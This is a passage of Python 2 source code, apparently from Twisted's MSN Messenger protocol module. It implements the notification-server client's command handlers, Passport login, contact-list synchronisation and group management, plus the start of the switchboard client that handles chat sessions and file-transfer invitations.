self._setState('CONNECTED')\n self.sendLine(\"VER %s %s\" % (self._nextTransactionID(), MSN_PROTOCOL_VERSION))\n\n def connectionLost(self, reason):\n self._setState('DISCONNECTED')\n self._state[1] = {}\n MSNEventBase.connectionLost(self, reason)\n\n def checkMessage(self, message):\n \"\"\" hook used for detecting specific notification messages \"\"\"\n cTypes = [s.lstrip() for s in message.getHeader('Content-Type').split(';')]\n if 'text/x-msmsgsprofile' in cTypes:\n self.gotProfile(message)\n return 0\n return 1\n\n ### protocol command handlers - no need to override these\n\n def handle_VER(self, params):\n id = self._nextTransactionID()\n self.sendLine(\"CVR %s %s %s\" % (id, MSN_CVR_STR, self.factory.userHandle))\n\n def handle_CVR(self, params):\n self.sendLine(\"USR %s TWN I %s\" % (self._nextTransactionID(), self.factory.userHandle))\n\n def handle_USR(self, params):\n if len(params) != 4 and len(params) != 6:\n raise MSNProtocolError, \"Invalid Number of 
Parameters for USR\"\n\n mechanism = params[1]\n if mechanism == \"OK\":\n self.loggedIn(params[2], unquote(params[3]), int(params[4]))\n elif params[2].upper() == \"S\":\n # we need to obtain auth from a passport server\n f = self.factory\n d = execute(\n _login, f.userHandle, f.password, f.passportServer,\n authData=params[3])\n d.addCallback(self._passportLogin)\n d.addErrback(self._passportError)\n\n def _passportLogin(self, result):\n if result[0] == LOGIN_REDIRECT:\n d = _login(self.factory.userHandle, self.factory.password,\n result[1], cached=1, authData=result[2])\n d.addCallback(self._passportLogin)\n d.addErrback(self._passportError)\n elif result[0] == LOGIN_SUCCESS:\n self.sendLine(\"USR %s TWN S %s\" % (self._nextTransactionID(), result[1]))\n elif result[0] == LOGIN_FAILURE:\n self.loginFailure(result[1])\n\n\n def _passportError(self, failure):\n \"\"\"\n Handle a problem logging in via the Passport server, passing on the\n error as a string message to the C{loginFailure} callback.\n \"\"\"\n if failure.check(SSLRequired):\n failure = failure.getErrorMessage()\n self.loginFailure(\"Exception while authenticating: %s\" % failure)\n\n\n def handle_CHG(self, params):\n checkParamLen(len(params), 3, 'CHG')\n id = int(params[0])\n if not self._fireCallback(id, params[1]):\n self.statusChanged(params[1])\n\n def handle_ILN(self, params):\n checkParamLen(len(params), 5, 'ILN')\n self.gotContactStatus(params[1], params[2], unquote(params[3]))\n\n def handle_CHL(self, params):\n checkParamLen(len(params), 2, 'CHL')\n self.sendLine(\"QRY %s msmsgs@msnmsgr.com 32\" % self._nextTransactionID())\n self.transport.write(md5(params[1] + MSN_CHALLENGE_STR).hexdigest())\n\n def handle_QRY(self, params):\n pass\n\n def handle_NLN(self, params):\n checkParamLen(len(params), 4, 'NLN')\n self.contactStatusChanged(params[0], params[1], unquote(params[2]))\n\n def handle_FLN(self, params):\n checkParamLen(len(params), 1, 'FLN')\n self.contactOffline(params[0])\n\n def handle_LST(self, params):\n # support no longer exists for manually\n # requesting lists - why do I feel cleaner now?\n if self._getState() != 'SYNC':\n return\n contact = MSNContact(userHandle=params[0], screenName=unquote(params[1]),\n lists=int(params[2]))\n if contact.lists & FORWARD_LIST:\n contact.groups.extend(map(int, params[3].split(',')))\n self._getStateData('list').addContact(contact)\n self._setStateData('last_contact', contact)\n sofar = self._getStateData('lst_sofar') + 1\n if sofar == self._getStateData('lst_reply'):\n # this is the best place to determine that\n # a syn realy has finished - msn _may_ send\n # BPR information for the last contact\n # which is unfortunate because it means\n # that the real end of a syn is non-deterministic.\n # to handle this we'll keep 'last_contact' hanging\n # around in the state data and update it if we need\n # to later.\n self._setState('SESSION')\n contacts = self._getStateData('list')\n phone = self._getStateData('phone')\n id = self._getStateData('synid')\n self._remStateData('lst_reply', 'lsg_reply', 'lst_sofar', 'phone', 'synid', 'list')\n self._fireCallback(id, contacts, phone)\n else:\n self._setStateData('lst_sofar',sofar)\n\n def handle_BLP(self, params):\n # check to see if this is in response to a SYN\n if self._getState() == 'SYNC':\n self._getStateData('list').privacy = listCodeToID[params[0].lower()]\n else:\n id = int(params[0])\n self._fireCallback(id, int(params[1]), listCodeToID[params[2].lower()])\n\n def handle_GTC(self, params):\n # check to see if this is in 
response to a SYN\n if self._getState() == 'SYNC':\n if params[0].lower() == \"a\":\n self._getStateData('list').autoAdd = 0\n elif params[0].lower() == \"n\":\n self._getStateData('list').autoAdd = 1\n else:\n raise MSNProtocolError, \"Invalid Paramater for GTC\" # debug\n else:\n id = int(params[0])\n if params[1].lower() == \"a\":\n self._fireCallback(id, 0)\n elif params[1].lower() == \"n\":\n self._fireCallback(id, 1)\n else:\n raise MSNProtocolError, \"Invalid Paramater for GTC\" # debug\n\n def handle_SYN(self, params):\n id = int(params[0])\n if len(params) == 2:\n self._setState('SESSION')\n self._fireCallback(id, None, None)\n else:\n contacts = MSNContactList()\n contacts.version = int(params[1])\n self._setStateData('list', contacts)\n self._setStateData('lst_reply', int(params[2]))\n self._setStateData('lsg_reply', int(params[3]))\n self._setStateData('lst_sofar', 0)\n self._setStateData('phone', [])\n\n def handle_LSG(self, params):\n if self._getState() == 'SYNC':\n self._getStateData('list').groups[int(params[0])] = unquote(params[1])\n\n # Please see the comment above the requestListGroups / requestList methods\n # regarding support for this\n #\n #else:\n # self._getStateData('groups').append((int(params[4]), unquote(params[5])))\n # if params[3] == params[4]: # this was the last group\n # self._fireCallback(int(params[0]), self._getStateData('groups'), int(params[1]))\n # self._remStateData('groups')\n\n def handle_PRP(self, params):\n if self._getState() == 'SYNC':\n self._getStateData('phone').append((params[0], unquote(params[1])))\n else:\n self._fireCallback(int(params[0]), int(params[1]), unquote(params[3]))\n\n def handle_BPR(self, params):\n numParams = len(params)\n if numParams == 2: # part of a syn\n self._getStateData('last_contact').setPhone(params[0], unquote(params[1]))\n elif numParams == 4:\n self.gotPhoneNumber(int(params[0]), params[1], params[2], unquote(params[3]))\n\n def handle_ADG(self, params):\n checkParamLen(len(params), 5, 'ADG')\n id = int(params[0])\n if not self._fireCallback(id, int(params[1]), unquote(params[2]), int(params[3])):\n raise MSNProtocolError, \"ADG response does not match up to a request\" # debug\n\n def handle_RMG(self, params):\n checkParamLen(len(params), 3, 'RMG')\n id = int(params[0])\n if not self._fireCallback(id, int(params[1]), int(params[2])):\n raise MSNProtocolError, \"RMG response does not match up to a request\" # debug\n\n def handle_REG(self, params):\n checkParamLen(len(params), 5, 'REG')\n id = int(params[0])\n if not self._fireCallback(id, int(params[1]), int(params[2]), unquote(params[3])):\n raise MSNProtocolError, \"REG response does not match up to a request\" # debug\n\n def handle_ADD(self, params):\n numParams = len(params)\n if numParams < 5 or params[1].upper() not in ('AL','BL','RL','FL'):\n raise MSNProtocolError, \"Invalid Paramaters for ADD\" # debug\n id = int(params[0])\n listType = params[1].lower()\n listVer = int(params[2])\n userHandle = params[3]\n groupID = None\n if numParams == 6: # they sent a group id\n if params[1].upper() != \"FL\":\n raise MSNProtocolError, \"Only forward list can contain groups\" # debug\n groupID = int(params[5])\n if not self._fireCallback(id, listCodeToID[listType], userHandle, listVer, groupID):\n self.userAddedMe(userHandle, unquote(params[4]), listVer)\n\n def handle_REM(self, params):\n numParams = len(params)\n if numParams < 4 or params[1].upper() not in ('AL','BL','FL','RL'):\n raise MSNProtocolError, \"Invalid Paramaters for REM\" # debug\n id = 
int(params[0])\n listType = params[1].lower()\n listVer = int(params[2])\n userHandle = params[3]\n groupID = None\n if numParams == 5:\n if params[1] != \"FL\":\n raise MSNProtocolError, \"Only forward list can contain groups\" # debug\n groupID = int(params[4])\n if not self._fireCallback(id, listCodeToID[listType], userHandle, listVer, groupID):\n if listType.upper() == \"RL\":\n self.userRemovedMe(userHandle, listVer)\n\n def handle_REA(self, params):\n checkParamLen(len(params), 4, 'REA')\n id = int(params[0])\n self._fireCallback(id, int(params[1]), unquote(params[3]))\n\n def handle_XFR(self, params):\n checkParamLen(len(params), 5, 'XFR')\n id = int(params[0])\n # check to see if they sent a host/port pair\n try:\n host, port = params[2].split(':')\n except ValueError:\n host = params[2]\n port = MSN_PORT\n\n if not self._fireCallback(id, host, int(port), params[4]):\n raise MSNProtocolError, \"Got XFR (referral) that I didn't ask for .. should this happen?\" # debug\n\n def handle_RNG(self, params):\n checkParamLen(len(params), 6, 'RNG')\n # check for host:port pair\n try:\n host, port = params[1].split(\":\")\n port = int(port)\n except ValueError:\n host = params[1]\n port = MSN_PORT\n self.gotSwitchboardInvitation(int(params[0]), host, port, params[3], params[4],\n unquote(params[5]))\n\n def handle_OUT(self, params):\n checkParamLen(len(params), 1, 'OUT')\n if params[0] == \"OTH\":\n self.multipleLogin()\n elif params[0] == \"SSD\":\n self.serverGoingDown()\n else:\n raise MSNProtocolError, \"Invalid Parameters received for OUT\" # debug\n\n # callbacks\n\n def loggedIn(self, userHandle, screenName, verified):\n \"\"\"\n Called when the client has logged in.\n The default behaviour of this method is to\n update the factory with our screenName and\n to sync the contact list (factory.contacts).\n When this is complete self.listSynchronized\n will be called.\n\n @param userHandle: our userHandle\n @param screenName: our screenName\n @param verified: 1 if our passport has been (verified), 0 if not.\n (i'm not sure of the significace of this)\n @type verified: int\n \"\"\"\n self.factory.screenName = screenName\n if not self.factory.contacts:\n listVersion = 0\n else:\n listVersion = self.factory.contacts.version\n self.syncList(listVersion).addCallback(self.listSynchronized)\n\n\n def loginFailure(self, message):\n \"\"\"\n Called when the client fails to login.\n\n @param message: a message indicating the problem that was encountered\n \"\"\"\n\n\n def gotProfile(self, message):\n \"\"\"\n Called after logging in when the server sends an initial\n message with MSN/passport specific profile information\n such as country, number of kids, etc.\n Check the message headers for the specific values.\n\n @param message: The profile message\n \"\"\"\n pass\n\n def listSynchronized(self, *args):\n \"\"\"\n Lists are now synchronized by default upon logging in, this\n method is called after the synchronization has finished\n and the factory now has the up-to-date contacts.\n \"\"\"\n pass\n\n def statusChanged(self, statusCode):\n \"\"\"\n Called when our status changes and it isn't in response to\n a client command. 
By default we will update the status\n attribute of the factory.\n\n @param statusCode: 3-letter status code\n \"\"\"\n self.factory.status = statusCode\n\n def gotContactStatus(self, statusCode, userHandle, screenName):\n \"\"\"\n Called after loggin in when the server sends status of online contacts.\n By default we will update the status attribute of the contact stored\n on the factory.\n\n @param statusCode: 3-letter status code\n @param userHandle: the contact's user handle (passport)\n @param screenName: the contact's screen name\n \"\"\"\n self.factory.contacts.getContact(userHandle).status = statusCode\n\n def contactStatusChanged(self, statusCode, userHandle, screenName):\n \"\"\"\n Called when we're notified that a contact's status has changed.\n By default we will update the status attribute of the contact\n stored on the factory.\n\n @param statusCode: 3-letter status code\n @param userHandle: the contact's user handle (passport)\n @param screenName: the contact's screen name\n \"\"\"\n self.factory.contacts.getContact(userHandle).status = statusCode\n\n def contactOffline(self, userHandle):\n \"\"\"\n Called when a contact goes offline. By default this method\n will update the status attribute of the contact stored\n on the factory.\n\n @param userHandle: the contact's user handle\n \"\"\"\n self.factory.contacts.getContact(userHandle).status = STATUS_OFFLINE\n\n def gotPhoneNumber(self, listVersion, userHandle, phoneType, number):\n \"\"\"\n Called when the server sends us phone details about\n a specific user (for example after a user is added\n the server will send their status, phone details etc.\n By default we will update the list version for the\n factory's contact list and update the phone details\n for the specific user.\n\n @param listVersion: the new list version\n @param userHandle: the contact's user handle (passport)\n @param phoneType: the specific phoneType\n (*_PHONE constants or HAS_PAGER)\n @param number: the value/phone number.\n \"\"\"\n self.factory.contacts.version = listVersion\n self.factory.contacts.getContact(userHandle).setPhone(phoneType, number)\n\n def userAddedMe(self, userHandle, screenName, listVersion):\n \"\"\"\n Called when a user adds me to their list. (ie. they have been added to\n the reverse list. 
By default this method will update the version of\n the factory's contact list -- that is, if the contact already exists\n it will update the associated lists attribute, otherwise it will create\n a new MSNContact object and store it.\n\n @param userHandle: the userHandle of the user\n @param screenName: the screen name of the user\n @param listVersion: the new list version\n @type listVersion: int\n \"\"\"\n self.factory.contacts.version = listVersion\n c = self.factory.contacts.getContact(userHandle)\n if not c:\n c = MSNContact(userHandle=userHandle, screenName=screenName)\n self.factory.contacts.addContact(c)\n c.addToList(REVERSE_LIST)\n\n def userRemovedMe(self, userHandle, listVersion):\n \"\"\"\n Called when a user removes us from their contact list\n (they are no longer on our reverseContacts list.\n By default this method will update the version of\n the factory's contact list -- that is, the user will\n be removed from the reverse list and if they are no longer\n part of any lists they will be removed from the contact\n list entirely.\n\n @param userHandle: the contact's user handle (passport)\n @param listVersion: the new list version\n \"\"\"\n self.factory.contacts.version = listVersion\n c = self.factory.contacts.getContact(userHandle)\n c.removeFromList(REVERSE_LIST)\n if c.lists == 0:\n self.factory.contacts.remContact(c.userHandle)\n\n def gotSwitchboardInvitation(self, sessionID, host, port,\n key, userHandle, screenName):\n \"\"\"\n Called when we get an invitation to a switchboard server.\n This happens when a user requests a chat session with us.\n\n @param sessionID: session ID number, must be remembered for logging in\n @param host: the hostname of the switchboard server\n @param port: the port to connect to\n @param key: used for authorization when connecting\n @param userHandle: the user handle of the person who invited us\n @param screenName: the screen name of the person who invited us\n \"\"\"\n pass\n\n def multipleLogin(self):\n \"\"\"\n Called when the server says there has been another login\n under our account, the server should disconnect us right away.\n \"\"\"\n pass\n\n def serverGoingDown(self):\n \"\"\"\n Called when the server has notified us that it is going down for\n maintenance.\n \"\"\"\n pass\n\n # api calls\n\n def changeStatus(self, status):\n \"\"\"\n Change my current status. This method will add\n a default callback to the returned Deferred\n which will update the status attribute of the\n factory.\n\n @param status: 3-letter status code (as defined by\n the STATUS_* constants)\n @return: A Deferred, the callback of which will be\n fired when the server confirms the change\n of status. The callback argument will be\n a tuple with the new status code as the\n only element.\n \"\"\"\n\n id, d = self._createIDMapping()\n self.sendLine(\"CHG %s %s\" % (id, status))\n def _cb(r):\n self.factory.status = r[0]\n return r\n return d.addCallback(_cb)\n\n # I am no longer supporting the process of manually requesting\n # lists or list groups -- as far as I can see this has no use\n # if lists are synchronized and updated correctly, which they\n # should be. 
If someone has a specific justified need for this\n # then please contact me and i'll re-enable/fix support for it.\n\n #def requestList(self, listType):\n # \"\"\"\n # request the desired list type\n #\n # @param listType: (as defined by the *_LIST constants)\n # @return: A Deferred, the callback of which will be\n # fired when the list has been retrieved.\n # The callback argument will be a tuple with\n # the only element being a list of MSNContact\n # objects.\n # \"\"\"\n # # this doesn't need to ever be used if syncing of the lists takes place\n # # i.e. please don't use it!\n # warnings.warn(\"Please do not use this method - use the list syncing process instead\")\n # id, d = self._createIDMapping()\n # self.sendLine(\"LST %s %s\" % (id, listIDToCode[listType].upper()))\n # self._setStateData('list',[])\n # return d\n\n def setPrivacyMode(self, privLevel):\n \"\"\"\n Set my privacy mode on the server.\n\n B{Note}:\n This only keeps the current privacy setting on\n the server for later retrieval, it does not\n effect the way the server works at all.\n\n @param privLevel: This parameter can be true, in which\n case the server will keep the state as\n 'al' which the official client interprets\n as -> allow messages from only users on\n the allow list. Alternatively it can be\n false, in which case the server will keep\n the state as 'bl' which the official client\n interprets as -> allow messages from all\n users except those on the block list.\n\n @return: A Deferred, the callback of which will be fired when\n the server replies with the new privacy setting.\n The callback argument will be a tuple, the 2 elements\n of which being the list version and either 'al'\n or 'bl' (the new privacy setting).\n \"\"\"\n\n id, d = self._createIDMapping()\n if privLevel:\n self.sendLine(\"BLP %s AL\" % id)\n else:\n self.sendLine(\"BLP %s BL\" % id)\n return d\n\n def syncList(self, version):\n \"\"\"\n Used for keeping an up-to-date contact list.\n A callback is added to the returned Deferred\n that updates the contact list on the factory\n and also sets my state to STATUS_ONLINE.\n\n B{Note}:\n This is called automatically upon signing\n in using the version attribute of\n factory.contacts, so you may want to persist\n this object accordingly. Because of this there\n is no real need to ever call this method\n directly.\n\n @param version: The current known list version\n\n @return: A Deferred, the callback of which will be\n fired when the server sends an adequate reply.\n The callback argument will be a tuple with two\n elements, the new list (MSNContactList) and\n your current state (a dictionary). If the version\n you sent _was_ the latest list version, both elements\n will be None. To just request the list send a version of 0.\n \"\"\"\n\n self._setState('SYNC')\n id, d = self._createIDMapping(data=str(version))\n self._setStateData('synid',id)\n self.sendLine(\"SYN %s %s\" % (id, version))\n def _cb(r):\n self.changeStatus(STATUS_ONLINE)\n if r[0] is not None:\n self.factory.contacts = r[0]\n return r\n return d.addCallback(_cb)\n\n\n # I am no longer supporting the process of manually requesting\n # lists or list groups -- as far as I can see this has no use\n # if lists are synchronized and updated correctly, which they\n # should be. 
If someone has a specific justified need for this\n # then please contact me and i'll re-enable/fix support for it.\n\n #def requestListGroups(self):\n # \"\"\"\n # Request (forward) list groups.\n #\n # @return: A Deferred, the callback for which will be called\n # when the server responds with the list groups.\n # The callback argument will be a tuple with two elements,\n # a dictionary mapping group IDs to group names and the\n # current list version.\n # \"\"\"\n #\n # # this doesn't need to be used if syncing of the lists takes place (which it SHOULD!)\n # # i.e. please don't use it!\n # warnings.warn(\"Please do not use this method - use the list syncing process instead\")\n # id, d = self._createIDMapping()\n # self.sendLine(\"LSG %s\" % id)\n # self._setStateData('groups',{})\n # return d\n\n def setPhoneDetails(self, phoneType, value):\n \"\"\"\n Set/change my phone numbers stored on the server.\n\n @param phoneType: phoneType can be one of the following\n constants - HOME_PHONE, WORK_PHONE,\n MOBILE_PHONE, HAS_PAGER.\n These are pretty self-explanatory, except\n maybe HAS_PAGER which refers to whether or\n not you have a pager.\n @param value: for all of the *_PHONE constants the value is a\n phone number (str), for HAS_PAGER accepted values\n are 'Y' (for yes) and 'N' (for no).\n\n @return: A Deferred, the callback for which will be fired when\n the server confirms the change has been made. The\n callback argument will be a tuple with 2 elements, the\n first being the new list version (int) and the second\n being the new phone number value (str).\n \"\"\"\n # XXX: Add a default callback which updates\n # factory.contacts.version and the relevant phone\n # number\n id, d = self._createIDMapping()\n self.sendLine(\"PRP %s %s %s\" % (id, phoneType, quote(value)))\n return d\n\n def addListGroup(self, name):\n \"\"\"\n Used to create a new list group.\n A default callback is added to the\n returned Deferred which updates the\n contacts attribute of the factory.\n\n @param name: The desired name of the new group.\n\n @return: A Deferred, the callbacck for which will be called\n when the server clarifies that the new group has been\n created. 
The callback argument will be a tuple with 3\n elements: the new list version (int), the new group name\n (str) and the new group ID (int).\n \"\"\"\n\n id, d = self._createIDMapping()\n self.sendLine(\"ADG %s %s 0\" % (id, quote(name)))\n def _cb(r):\n self.factory.contacts.version = r[0]\n self.factory.contacts.setGroup(r[1], r[2])\n return r\n return d.addCallback(_cb)\n\n def remListGroup(self, groupID):\n \"\"\"\n Used to remove a list group.\n A default callback is added to the\n returned Deferred which updates the\n contacts attribute of the factory.\n\n @param groupID: the ID of the desired group to be removed.\n\n @return: A Deferred, the callback for which will be called when\n the server clarifies the deletion of the group.\n The callback argument will be a tuple with 2 elements:\n the new list version (int) and the group ID (int) of\n the removed group.\n \"\"\"\n\n id, d = self._createIDMapping()\n self.sendLine(\"RMG %s %s\" % (id, groupID))\n def _cb(r):\n self.factory.contacts.version = r[0]\n self.factory.contacts.remGroup(r[1])\n return r\n return d.addCallback(_cb)\n\n def renameListGroup(self, groupID, newName):\n \"\"\"\n Used to rename an existing list group.\n A default callback is added to the returned\n Deferred which updates the contacts attribute\n of the factory.\n\n @param groupID: the ID of the desired group to rename.\n @param newName: the desired new name for the group.\n\n @return: A Deferred, the callback for which will be called\n when the server clarifies the renaming.\n The callback argument will be a tuple of 3 elements,\n the new list version (int), the group id (int) and\n the new group name (str).\n \"\"\"\n\n id, d = self._createIDMapping()\n self.sendLine(\"REG %s %s %s 0\" % (id, groupID, quote(newName)))\n def _cb(r):\n self.factory.contacts.version = r[0]\n self.factory.contacts.setGroup(r[1], r[2])\n return r\n return d.addCallback(_cb)\n\n def addContact(self, listType, userHandle, groupID=0):\n \"\"\"\n Used to add a contact to the desired list.\n A default callback is added to the returned\n Deferred which updates the contacts attribute of\n the factory with the new contact information.\n If you are adding a contact to the forward list\n and you want to associate this contact with multiple\n groups then you will need to call this method for each\n group you would like to add them to, changing the groupID\n parameter. The default callback will take care of updating\n the group information on the factory's contact list.\n\n @param listType: (as defined by the *_LIST constants)\n @param userHandle: the user handle (passport) of the contact\n that is being added\n @param groupID: the group ID for which to associate this contact\n with. (default 0 - default group). 
Groups are only\n valid for FORWARD_LIST.\n\n @return: A Deferred, the callback for which will be called when\n the server has clarified that the user has been added.\n The callback argument will be a tuple with 4 elements:\n the list type, the contact's user handle, the new list\n version, and the group id (if relevant, otherwise it\n will be None)\n \"\"\"\n\n id, d = self._createIDMapping()\n listType = listIDToCode[listType].upper()\n if listType == \"FL\":\n self.sendLine(\"ADD %s FL %s %s %s\" % (id, userHandle, userHandle, groupID))\n else:\n self.sendLine(\"ADD %s %s %s %s\" % (id, listType, userHandle, userHandle))\n\n def _cb(r):\n self.factory.contacts.version = r[2]\n c = self.factory.contacts.getContact(r[1])\n if not c:\n c = MSNContact(userHandle=r[1])\n if r[3]:\n c.groups.append(r[3])\n c.addToList(r[0])\n return r\n return d.addCallback(_cb)\n\n def remContact(self, listType, userHandle, groupID=0):\n \"\"\"\n Used to remove a contact from the desired list.\n A default callback is added to the returned deferred\n which updates the contacts attribute of the factory\n to reflect the new contact information. If you are\n removing from the forward list then you will need to\n supply a groupID, if the contact is in more than one\n group then they will only be removed from this group\n and not the entire forward list, but if this is their\n only group they will be removed from the whole list.\n\n @param listType: (as defined by the *_LIST constants)\n @param userHandle: the user handle (passport) of the\n contact being removed\n @param groupID: the ID of the group to which this contact\n belongs (only relevant for FORWARD_LIST,\n default is 0)\n\n @return: A Deferred, the callback for which will be called when\n the server has clarified that the user has been removed.\n The callback argument will be a tuple of 4 elements:\n the list type, the contact's user handle, the new list\n version, and the group id (if relevant, otherwise it will\n be None)\n \"\"\"\n\n id, d = self._createIDMapping()\n listType = listIDToCode[listType].upper()\n if listType == \"FL\":\n self.sendLine(\"REM %s FL %s %s\" % (id, userHandle, groupID))\n else:\n self.sendLine(\"REM %s %s %s\" % (id, listType, userHandle))\n\n def _cb(r):\n l = self.factory.contacts\n l.version = r[2]\n c = l.getContact(r[1])\n group = r[3]\n shouldRemove = 1\n if group: # they may not have been removed from the list\n c.groups.remove(group)\n if c.groups:\n shouldRemove = 0\n if shouldRemove:\n c.removeFromList(r[0])\n if c.lists == 0:\n l.remContact(c.userHandle)\n return r\n return d.addCallback(_cb)\n\n def changeScreenName(self, newName):\n \"\"\"\n Used to change your current screen name.\n A default callback is added to the returned\n Deferred which updates the screenName attribute\n of the factory and also updates the contact list\n version.\n\n @param newName: the new screen name\n\n @return: A Deferred, the callback for which will be called\n when the server sends an adequate reply.\n The callback argument will be a tuple of 2 elements:\n the new list version and the new screen name.\n \"\"\"\n\n id, d = self._createIDMapping()\n self.sendLine(\"REA %s %s %s\" % (id, self.factory.userHandle, quote(newName)))\n def _cb(r):\n self.factory.contacts.version = r[0]\n self.factory.screenName = r[1]\n return r\n return d.addCallback(_cb)\n\n def requestSwitchboardServer(self):\n \"\"\"\n Used to request a switchboard server to use for conversations.\n\n @return: A Deferred, the callback for which will be called when\n the 
server responds with the switchboard information.\n The callback argument will be a tuple with 3 elements:\n the host of the switchboard server, the port and a key\n used for logging in.\n \"\"\"\n\n id, d = self._createIDMapping()\n self.sendLine(\"XFR %s SB\" % id)\n return d\n\n def logOut(self):\n \"\"\"\n Used to log out of the notification server.\n After running the method the server is expected\n to close the connection.\n \"\"\"\n\n self.sendLine(\"OUT\")\n\nclass NotificationFactory(ClientFactory):\n \"\"\"\n Factory for the NotificationClient protocol.\n This is basically responsible for keeping\n the state of the client and thus should be used\n in a 1:1 situation with clients.\n\n @ivar contacts: An MSNContactList instance reflecting\n the current contact list -- this is\n generally kept up to date by the default\n command handlers.\n @ivar userHandle: The client's userHandle, this is expected\n to be set by the client and is used by the\n protocol (for logging in etc).\n @ivar screenName: The client's current screen-name -- this is\n generally kept up to date by the default\n command handlers.\n @ivar password: The client's password -- this is (obviously)\n expected to be set by the client.\n @ivar passportServer: This must point to an msn passport server\n (the whole URL is required)\n @ivar status: The status of the client -- this is generally kept\n up to date by the default command handlers\n \"\"\"\n\n contacts = None\n userHandle = ''\n screenName = ''\n password = ''\n passportServer = 'https://nexus.passport.com/rdr/pprdr.asp'\n status = 'FLN'\n protocol = NotificationClient\n\n\n# XXX: A lot of the state currently kept in\n# instances of SwitchboardClient is likely to\n# be moved into a factory at some stage in the\n# future\n\nclass SwitchboardClient(MSNEventBase):\n \"\"\"\n This class provides support for clients connecting to a switchboard server.\n\n Switchboard servers are used for conversations with other people\n on the MSN network. 
This means that the number of conversations at\n any given time will be directly proportional to the number of\n connections to varioius switchboard servers.\n\n MSN makes no distinction between single and group conversations,\n so any number of users may be invited to join a specific conversation\n taking place on a switchboard server.\n\n @ivar key: authorization key, obtained when receiving\n invitation / requesting switchboard server.\n @ivar userHandle: your user handle (passport)\n @ivar sessionID: unique session ID, used if you are replying\n to a switchboard invitation\n @ivar reply: set this to 1 in connectionMade or before to signifiy\n that you are replying to a switchboard invitation.\n \"\"\"\n\n key = 0\n userHandle = \"\"\n sessionID = \"\"\n reply = 0\n\n _iCookie = 0\n\n def __init__(self):\n MSNEventBase.__init__(self)\n self.pendingUsers = {}\n self.cookies = {'iCookies' : {}, 'external' : {}} # will maybe be moved to a factory in the future\n\n def connectionMade(self):\n MSNEventBase.connectionMade(self)\n print 'sending initial stuff'\n self._sendInit()\n\n def connectionLost(self, reason):\n self.cookies['iCookies'] = {}\n self.cookies['external'] = {}\n MSNEventBase.connectionLost(self, reason)\n\n def _sendInit(self):\n \"\"\"\n send initial data based on whether we are replying to an invitation\n or starting one.\n \"\"\"\n id = self._nextTransactionID()\n if not self.reply:\n self.sendLine(\"USR %s %s %s\" % (id, self.userHandle, self.key))\n else:\n self.sendLine(\"ANS %s %s %s %s\" % (id, self.userHandle, self.key, self.sessionID))\n\n def _newInvitationCookie(self):\n self._iCookie += 1\n if self._iCookie > 1000:\n self._iCookie = 1\n return self._iCookie\n\n def _checkTyping(self, message, cTypes):\n \"\"\" helper method for checkMessage \"\"\"\n if 'text/x-msmsgscontrol' in cTypes and message.hasHeader('TypingUser'):\n self.userTyping(message)\n return 1\n\n def _checkFileInvitation(self, message, info):\n \"\"\" helper method for checkMessage \"\"\"\n guid = info.get('Application-GUID', '').lower()\n name = info.get('Application-Name', '').lower()\n\n # Both fields are required, but we'll let some lazy clients get away\n # with only sending a name, if it is easy for us to recognize the\n # name (the name is localized, so this check might fail for lazy,\n # non-english clients, but I'm not about to include \"file transfer\"\n # in 80 different languages here).\n\n if name != \"file transfer\" and guid != classNameToGUID[\"file transfer\"]:\n return 0\n try:\n cookie = int(info['Invitation-Cookie'])\n fileName = info['Application-File']\n fileSize = int(info['Application-FileSize'])\n except KeyError:\n log.msg('Received munged file transfer request ... 
ignoring.')\n return 0\n self.gotSendRequest(fileName, fileSize, cookie, message)\n return 1\n\n def _checkFileResponse(self, message, info):\n \"\"\" helper method for checkMessage \"\"\"\n try:\n cmd = info['Invitation-Command'].upper()\n cookie = int(info['Invitation-Cookie'])\n except KeyError:\n return 0\n accept = (cmd == 'ACCEPT') and 1 or 0\n requested = self.cookies['iCookies'].get(cookie)\n if not requested:\n return 1\n requested[0].callback((accept, cookie, info))\n del self.cookies['iCookies'][cookie]\n return 1\n\n def _checkFileInfo(self, message, info):\n \"\"\" helper method for checkMessage \"\"\"\n try:\n ip = info['IP-Address']\n iCookie = int(info['Invitation-Cookie'])\n aCookie = int(info['AuthCookie'])\n cmd = info['Invitation-Command'].upper()\n port = int(info['Port'])\n except KeyError:\n return 0\n accept = (cmd == 'ACCEPT') and 1 or 0\n requested = self.cookies['external'].get(iCookie)\n if not requested:\n return 1 # we didn't ask for this\n requested[0].callback((accept, ip, port, aCookie, info))\n del self.cookies['external'][iCookie]\n return 1\n\n def checkMessage(self, message):\n \"\"\"\n hook for detecting any notification type messages\n (e.g. file transfer)\n \"\"\"\n cTypes = [s.lstrip() for s in message.getHeader('Content-Type').split(';')]\n if self._checkTyping(message, cTypes):\n return 0\n if 'text/x-msmsgsinvite' in cTypes:\n # header like info is sent as part of the message body.\n info = {}\n for line in message.message.split('\\r\\n'):\n try:\n key, val = line.split(':')\n info[key] = val.lstrip()\n except ValueError:\n continue\n if self._checkFileInvitation(message, info) or self._checkFileInfo(message, info) or self._checkFileResponse(message, info):\n return 0\n elif 'text/x-clientcaps' in cTypes:\n # do something with capabilities\n return 0\n return 1\n\n # negotiation\n def handle_USR(self, params):\n checkParamLen(len(params), 4, 'USR')\n if params[1] == \"OK\":\n self.loggedIn()\n\n # invite a user\n def handle_CAL(self, params):\n checkParamLen(len(params), 3, 'CAL')\n id = int(params[0])\n if params[1].upper() == \"RINGING\":\n self._fireCallback(id, int(params[2])) # session ID as parameter\n\n # user joined\n def handle_JOI(self, params):\n checkParamLen(len(params), 2, 'JOI')\n self.userJoined(params[0], unquote(params[1]))\n\n # users participating in the current chat\n def handle_IRO(self, params):\n checkParamLen(len(params), 5, 'IRO')\n self.pendingUsers[params[3]] = unquote(params[4])\n if params[1] == params[2]:\n self.gotChattingUsers(self.pendingUsers)\n self.pendingUsers = {}\n\n # finished listing users\n def handle_ANS(self, params):\n checkParamLen(len(params), 2, 'ANS')\n if params[1] == \"OK\":\n self.loggedIn()\n\n def handle_ACK(self, params):\n checkParamLen(len(params), 1, 'ACK')\n self._fireCallback(int(params[0]), None)\n\n def handle_NAK(self, params):\n checkParamLen(len(params), 1, 'NAK')\n self._fireCallback(int(params[0]), None)\n\n def handle_BYE(self, params):\n #checkParamLen(len(params), 1, 'BYE') # i've seen more than 1 param passed to this\n self.userLeft(params[0])\n\n # callbacks\n\n def loggedIn(self):\n \"\"\"\n called when all login details have been negotiated.\n Messages can now be sent, or new users invited.\n \"\"\"\n pass\n\n def gotChattingUsers(self, users):\n \"\"\"\n called after connecting to an existing chat session.\n\n @param users: A dict mapping user handles to screen names\n (current users taking part in the conversation)\n \"\"\"\n 